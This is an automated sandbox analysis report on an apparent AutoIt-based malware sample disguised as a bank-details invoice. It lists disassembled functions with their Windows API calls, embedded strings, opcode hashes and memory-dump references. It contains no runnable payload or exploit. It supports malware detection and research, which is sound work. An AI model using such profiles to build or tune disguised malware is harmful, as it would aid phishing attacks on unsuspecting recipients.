                    • DeleteObject.GDI32(00000000), ref: 004CA2FE
                    • DeleteObject.GDI32(00000000), ref: 004CA310
                    • DestroyWindow.USER32 ref: 004CA31E
                    • GetDesktopWindow.USER32 ref: 004CA338
                    • GetWindowRect.USER32(00000000), ref: 004CA33F
                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004CA480
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004CA490
                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA4D8
                    • GetClientRect.USER32(00000000,?), ref: 004CA4E4
                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004CA51E
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA540
                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA553
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA55E
                    • GlobalLock.KERNEL32(00000000), ref: 004CA567
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA576
                    • GlobalUnlock.KERNEL32(00000000), ref: 004CA57F
                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA586
                    • GlobalFree.KERNEL32(00000000), ref: 004CA591
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA5A3
                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,004FD9BC,00000000), ref: 004CA5B9
                    • GlobalFree.KERNEL32(00000000), ref: 004CA5C9
                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 004CA5EF
                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 004CA60E
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA630
                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA81D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                    • String ID: $AutoIt v3$DISPLAY$static
                    • API String ID: 2211948467-2373415609
                    • Opcode ID: 4b8e8b98cd6f9f8eb6dd054fd01ae188314a6915027f997107164322fe1d894e
                    • Instruction ID: 26b2664f0f4913be2c67de11eb4f0519f5e118c0bced4da7d785a1163264309b
                    • Opcode Fuzzy Hash: 4b8e8b98cd6f9f8eb6dd054fd01ae188314a6915027f997107164322fe1d894e
                    • Instruction Fuzzy Hash: 72027C75900208AFDB14DFA4CD89EAE7BB9FF49314F008169F905AB2A1C7749D51CB68
                    Function 004DD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                    Download Yara Rule
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 004DD2DB
                    • GetSysColorBrush.USER32(0000000F), ref: 004DD30C
                    • GetSysColor.USER32(0000000F), ref: 004DD318
                    • SetBkColor.GDI32(?,000000FF), ref: 004DD332
                    • SelectObject.GDI32(?,00000000), ref: 004DD341
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004DD36C
                    • GetSysColor.USER32(00000010), ref: 004DD374
                    • CreateSolidBrush.GDI32(00000000), ref: 004DD37B
                    • FrameRect.USER32(?,?,00000000), ref: 004DD38A
                    • DeleteObject.GDI32(00000000), ref: 004DD391
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 004DD3DC
                    • FillRect.USER32(?,?,00000000), ref: 004DD40E
                    • GetWindowLongW.USER32(?,000000F0), ref: 004DD439
                      • Part of subcall function 004DD575: GetSysColor.USER32(00000012), ref: 004DD5AE
                      • Part of subcall function 004DD575: SetTextColor.GDI32(?,?), ref: 004DD5B2
                      • Part of subcall function 004DD575: GetSysColorBrush.USER32(0000000F), ref: 004DD5C8
                      • Part of subcall function 004DD575: GetSysColor.USER32(0000000F), ref: 004DD5D3
                      • Part of subcall function 004DD575: GetSysColor.USER32(00000011), ref: 004DD5F0
                      • Part of subcall function 004DD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004DD5FE
                      • Part of subcall function 004DD575: SelectObject.GDI32(?,00000000), ref: 004DD60F
                      • Part of subcall function 004DD575: SetBkColor.GDI32(?,00000000), ref: 004DD618
                      • Part of subcall function 004DD575: SelectObject.GDI32(?,?), ref: 004DD625
                      • Part of subcall function 004DD575: InflateRect.USER32(?,000000FF,000000FF), ref: 004DD644
                      • Part of subcall function 004DD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004DD65B
                      • Part of subcall function 004DD575: GetWindowLongW.USER32(00000000,000000F0), ref: 004DD670
                      • Part of subcall function 004DD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004DD698
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                    • String ID:
                    • API String ID: 3521893082-0
                    • Opcode ID: f5503a58b9e8f4e2aabf38a6610d135b477bda0acbe4ae65a27c0f35aeb8f96b
                    • Instruction ID: ee8ad7f0325b8cb6bb6bb9b7f6fc72dbfa8b7a18764d2fa6093c9b1c7173b797
                    • Opcode Fuzzy Hash: f5503a58b9e8f4e2aabf38a6610d135b477bda0acbe4ae65a27c0f35aeb8f96b
                    • Instruction Fuzzy Hash: 2D91B471808301BFC7109F64DC08E6F7BAAFF89325F101A2AF962962E0C775D955CB5A
                    Function 0048B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32 ref: 0048B98B
                    • DeleteObject.GDI32(00000000), ref: 0048B9CD
                    • DeleteObject.GDI32(00000000), ref: 0048B9D8
                    • DestroyIcon.USER32(00000000), ref: 0048B9E3
                    • DestroyWindow.USER32(00000000), ref: 0048B9EE
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 004ED2AA
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 004ED2E3
                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 004ED711
                      • Part of subcall function 0048B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0048B759,?,00000000,?,?,?,?,0048B72B,00000000,?), ref: 0048BA58
                    • SendMessageW.USER32 ref: 004ED758
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 004ED76F
                    • ImageList_Destroy.COMCTL32(00000000), ref: 004ED785
                    • ImageList_Destroy.COMCTL32(00000000), ref: 004ED790
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    • API String ID: 464785882-4108050209
                    • Opcode ID: 615d5b0bef7c457a0926a1bd792da1f24fb9cdce6610cfb2f2c4886303d39aae
                    • Instruction ID: e2f4990cd360787c26723b4b57ec2e260306042e321f42db2740e46f84d18414
                    • Opcode Fuzzy Hash: 615d5b0bef7c457a0926a1bd792da1f24fb9cdce6610cfb2f2c4886303d39aae
                    • Instruction Fuzzy Hash: AC12C070900241EFDB25DF25C884BAAB7E1FF05305F14496EE989CB252C739EC52DB99
                    Function 004BDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 004BDBD6
                    • GetDriveTypeW.KERNEL32(?,0050DC54,?,\\.\,0050DC00), ref: 004BDCC3
                    • SetErrorMode.KERNEL32(00000000,0050DC54,?,\\.\,0050DC00), ref: 004BDE29
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: 58f89cda85d9e2715a2fa4507b4cee5fee3443df63f2fcec88f0e510f75c9854
                    • Instruction ID: 007745546dcc931fb02023f143fc5688bc69863d5d401b9e59b90e54477dcaed
                    • Opcode Fuzzy Hash: 58f89cda85d9e2715a2fa4507b4cee5fee3443df63f2fcec88f0e510f75c9854
                    • Instruction Fuzzy Hash: B251D630A08702ABC704DF10D8818AABBA6FF55305B10489FF087972D1EB6CD956DB6F
                    Function 0047CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: 2f8aded33bbd2cb7661071d689a6c5af521d19aec2e62206fe8937f225c1f9ed
                    • Instruction ID: df6847a4ab225ca8d7c64f38a1f6b7b53ecb94e332d6f44e747b4e650ee55b2f
                    • Opcode Fuzzy Hash: 2f8aded33bbd2cb7661071d689a6c5af521d19aec2e62206fe8937f225c1f9ed
                    • Instruction Fuzzy Hash: 46810A316402157ADB25BB66DD82FEF3B6DAF14305F04803FF909661C6EB68DA01D2AD
                    Function 004DC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                    Download Yara Rule
                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 004DC788
                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004DC83E
                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 004DC859
                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 004DCB15
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: 0
                    • API String ID: 2326795674-4108050209
                    • Opcode ID: e3e37d76f0b08cbaea5c2cfffd1d2ffe2848d95a21558252a617398b94dbe5a5
                    • Instruction ID: 493871adfb7a61985eb32c7bd95700378a93703f8e3b58f2d26d04436bead247
                    • Opcode Fuzzy Hash: e3e37d76f0b08cbaea5c2cfffd1d2ffe2848d95a21558252a617398b94dbe5a5
                    • Instruction Fuzzy Hash: A3F1B171604302AFE7218F24C8A5BABBBE5FF45314F04052BF589D63A1C778D845DB9A
                    Function 004D638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,0050DC00), ref: 004D6449
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 3964851224-45149045
                    • Opcode ID: ff7ee7ea5636da41ba71cf62acefe5d2200e3dc218ece3daba8b889de7767db3
                    • Instruction ID: cafd546cad2d63f5fa7151755b3c3c98a3e0497b7358aabffb2083418f0cb095
                    • Opcode Fuzzy Hash: ff7ee7ea5636da41ba71cf62acefe5d2200e3dc218ece3daba8b889de7767db3
                    • Instruction Fuzzy Hash: 05C19F306042058BCB04EF11D561AAE77E5AF95348F05485FF8865B3E3DB28ED4BCB8A
                    Function 004DD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000012), ref: 004DD5AE
                    • SetTextColor.GDI32(?,?), ref: 004DD5B2
                    • GetSysColorBrush.USER32(0000000F), ref: 004DD5C8
                    • GetSysColor.USER32(0000000F), ref: 004DD5D3
                    • CreateSolidBrush.GDI32(?), ref: 004DD5D8
                    • GetSysColor.USER32(00000011), ref: 004DD5F0
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004DD5FE
                    • SelectObject.GDI32(?,00000000), ref: 004DD60F
                    • SetBkColor.GDI32(?,00000000), ref: 004DD618
                    • SelectObject.GDI32(?,?), ref: 004DD625
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004DD644
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004DD65B
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004DD670
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004DD698
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004DD6BF
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 004DD6DD
                    • DrawFocusRect.USER32(?,?), ref: 004DD6E8
                    • GetSysColor.USER32(00000011), ref: 004DD6F6
                    • SetTextColor.GDI32(?,00000000), ref: 004DD6FE
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004DD712
                    • SelectObject.GDI32(?,004DD2A5), ref: 004DD729
                    • DeleteObject.GDI32(?), ref: 004DD734
                    • SelectObject.GDI32(?,?), ref: 004DD73A
                    • DeleteObject.GDI32(?), ref: 004DD73F
                    • SetTextColor.GDI32(?,?), ref: 004DD745
                    • SetBkColor.GDI32(?,?), ref: 004DD74F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 8cb20633f7fbff6243881339fcd93c02893ad4f7b3afd5addb2b6e43ee4503d3
                    • Instruction ID: e064b1879bf33d7450b5235cfdc5d1c0cb326c79dae6c029d60064407fc9b154
                    • Opcode Fuzzy Hash: 8cb20633f7fbff6243881339fcd93c02893ad4f7b3afd5addb2b6e43ee4503d3
                    • Instruction Fuzzy Hash: 7A515C71D00208BFDB10AFA4DD48EAE7B7AEF08324F104526F915AB2A1D7759A50DF94
                    Function 004DB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004DB7B0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004DB7C1
                    • CharNextW.USER32(0000014E), ref: 004DB7F0
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004DB831
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004DB847
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004DB858
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 004DB875
                    • SetWindowTextW.USER32(?,0000014E), ref: 004DB8C7
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 004DB8DD
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 004DB90E
                    • _memset.LIBCMT ref: 004DB933
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 004DB97C
                    • _memset.LIBCMT ref: 004DB9DB
                    • SendMessageW.USER32 ref: 004DBA05
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 004DBA5D
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 004DBB0A
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004DBB2C
                    • GetMenuItemInfoW.USER32(?), ref: 004DBB76
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004DBBA3
                    • DrawMenuBar.USER32(?), ref: 004DBBB2
                    • SetWindowTextW.USER32(?,0000014E), ref: 004DBBDA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: f2460ff8e6fdb6bbf680defb8d1748e7108d979163b4b8bae7f335ffe1b4bdbe
                    • Instruction ID: bcafb5e1aa2c24dc3a9a424fa931b10a06698b50e7455a37959f8ff199fd9265
                    • Opcode Fuzzy Hash: f2460ff8e6fdb6bbf680defb8d1748e7108d979163b4b8bae7f335ffe1b4bdbe
                    • Instruction Fuzzy Hash: B3E18074900208EBDF109FA1CC95AEE7B78FF05714F10815BF919AA390DB789A41DFA9
                    Function 00472EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$Foreground
                    • String ID: ACTIVE$ALL$CLASS$H+R$HANDLE$INSTANCE$L+R$LAST$P+R$REGEXPCLASS$REGEXPTITLE$T+R$TITLE
                    • API String ID: 62970417-1561553379
                    • Opcode ID: 14283c34e08d7c4b981bc788e56ad95c23c20acfbfe3e22ab4f7c7420c1e5528
                    • Instruction ID: 66c18b7a90c9e7f6ba6fd162d43a3eb6abce130b9bc29915af9cacb95b2fc322
                    • Opcode Fuzzy Hash: 14283c34e08d7c4b981bc788e56ad95c23c20acfbfe3e22ab4f7c7420c1e5528
                    • Instruction Fuzzy Hash: 7AD10B30508682ABCB04EF22C541A9FBBB5FF54305F00891FF459536A2DB78E95ACF99
                    Function 004D764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 004D778A
                    • GetDesktopWindow.USER32 ref: 004D779F
                    • GetWindowRect.USER32(00000000), ref: 004D77A6
                    • GetWindowLongW.USER32(?,000000F0), ref: 004D7808
                    • DestroyWindow.USER32(?), ref: 004D7834
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004D785D
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004D787B
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004D78A1
                    • SendMessageW.USER32(?,00000421,?,?), ref: 004D78B6
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004D78C9
                    • IsWindowVisible.USER32(?), ref: 004D78E9
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004D7904
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 004D7918
                    • GetWindowRect.USER32(?,?), ref: 004D7930
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 004D7956
                    • GetMonitorInfoW.USER32 ref: 004D7970
                    • CopyRect.USER32(?,?), ref: 004D7987
                    • SendMessageW.USER32(?,00000412,00000000), ref: 004D79F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: e01e20451df1d467b1c51c9742ace1f0999017f3c13547843a3a59d456627d6e
                    • Instruction ID: e0584fa4c418cdf37872f99e080135dd75839da157069bacb91f05a78b1ed31d
                    • Opcode Fuzzy Hash: e01e20451df1d467b1c51c9742ace1f0999017f3c13547843a3a59d456627d6e
                    • Instruction Fuzzy Hash: 9FB18F71608300AFDB04DF65C958B6ABBE5FF88314F00891EF5999B391E774E805CB9A
                    Function 004B6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                    Download Yara Rule
                    APIs
                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004B6CFB
                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004B6D21
                    • _wcscpy.LIBCMT ref: 004B6D4F
                    • _wcscmp.LIBCMT ref: 004B6D5A
                    • _wcscat.LIBCMT ref: 004B6D70
                    • _wcsstr.LIBCMT ref: 004B6D7B
                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004B6D97
                    • _wcscat.LIBCMT ref: 004B6DE0
                    • _wcscat.LIBCMT ref: 004B6DE7
                    • _wcsncpy.LIBCMT ref: 004B6E12
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
